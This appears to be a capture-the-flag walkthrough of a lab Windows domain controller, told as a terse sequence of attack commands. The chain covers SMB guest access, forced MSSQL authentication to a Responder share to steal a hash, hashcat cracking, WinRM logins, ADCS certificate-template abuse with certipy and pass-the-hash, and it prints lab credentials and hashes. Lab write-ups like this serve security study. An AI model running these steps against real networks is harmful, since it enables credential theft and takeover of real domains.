Netscan
10.10.11.202
sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
echo "-----------------------------------------------------"
echo "TCP is done, startng udp (slowwwwww)"
echo "-----------------------------------------------------"
sudo nmap -T4 -sU -A -vv -p- -o udp --min-rate 1000 $IPLdap reveals domain
dc.sequel.htb
sequel.htbWe can add these to /etc/hosts
10.10.11.202 dc.sequel.htb sequel.htb dcSMB
smbmap -H sequel.htb -u '' -p ''No output
Lets try netexec
nxc smb dc.sequel.htb -u '' -p '' --sharesdid not work.
Adding any value to the username flag may give you access
nxc smb sequel.htb -u 'random' -p '' --sharesThat workes
Lets look at public
smbclient.py random@sequel.htbEnter nothing for password
PDF in public, lets download it
Reading through, we find a user:
brandon.brown@sequel.htbAlso we find credentials.
PublicUser:GuestUserCantWrite1MSSQL - Lateral Movement
Lets login to mssql
impacket-mssqlclient PublicUser:GuestUserCantWrite1@sequel.htbwhat can we do?
No commands :(
canβt enable
We do have permissions for directory listing: xp_dirtree
We use that to force authentication to a rogue share and steal a hash
setup responder
sudo responder -I tun0then call any share with xp_dirtree
xp_dirtree \\10.10.16.2\pwn
crack with hashcat - ntlmv2 = 5600
hashcat -m 5600 sql_hash /usr/share/wordlists/rockyou.txtCRACKED
sql_svc:REGGIE1234ronnieMore access?
Maybe we can xp_cmdshell on this user?
impacket-mssqlclient sql_svc:REGGIE1234ronnie@sequel.htbALWAYS SPRAY ACROSS ALL SERVICES WHEN YOU FIND CREDS
we have winrm access
evil-winrm -u 'sql_svc' -p 'REGGIE1234ronnie' -i sequel.htbCheck users dir
We need to pivot into Ryan.Cooper
we find SQL error log bakup file in
C:\SQLServer\Logs> type ERROR* Interesting entries
2022-11-18 13:43:06.74 spid9s SQL Trace ID 1 was started by login "sa".
2022-11-18 13:43:06.74 spid9s Server name is 'DC\SQLMOCK'. This is an informational message only. No user action is required.
2022-11-18 13:43:06.75 spid14s Starting up database 'mssqlsystemresource'.
2022-11-18 13:43:06.75 spid9s Starting up database 'msdb'.
2022-11-18 13:43:06.75 spid18s Password policy update was successful.Possible account to kerberoast
MSSQLSvc/dc.sequel.htb:SQLMOCKPossible credential
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
NuclearMosquito3Its possible the user entered there password in the username prompt and caused it to be logged
nxc smb sequel.htb -u 'Ryan.Cooper' -p 'NuclearMosquito3'
Valid creds
WinRM with new creds
evil-winrm -u 'Ryan.Cooper' -p 'NuclearMosquito3' -i sequel.htbUser flag!
79e2....f42Priv Esc
After looking around for a long time, I had to read a writeup. This box is vulnerable to an ADCS attack
we can check with nxc first
nxc ldap 10.10.11.202 -u ryan.cooper -p NuclearMosquito3 -M adcs
We can use certipy to find vulnerable template
certipy-ad find -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -text -stdout -vulnerableFound UserAuthentication template allows client authentication
We can now request a pfx
certipy-ad req -u ryan.cooper -p NuclearMosquito3 -target sequel.htb -upn administrator@sequel.htb -ca sequel-dc-ca -template UserAuthentication
Now we can see if we can auth, get a tgt, get a hash
certipy-ad auth -pfx administrator.pfx error :(
For certain kerberos functions to work properly, we must have a local<>remote clock.
we can sync with ntupdate
sudo apt install ntpdatesudo ntpdate -u sequel.htb
just auth with the hash?
administrator:aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4eeevil-winrm -u 'administrator' -H 'a52f78e4c751e5f5e17e1e9f3e58f4ee' -i sequel.htb
final flag
c663....3c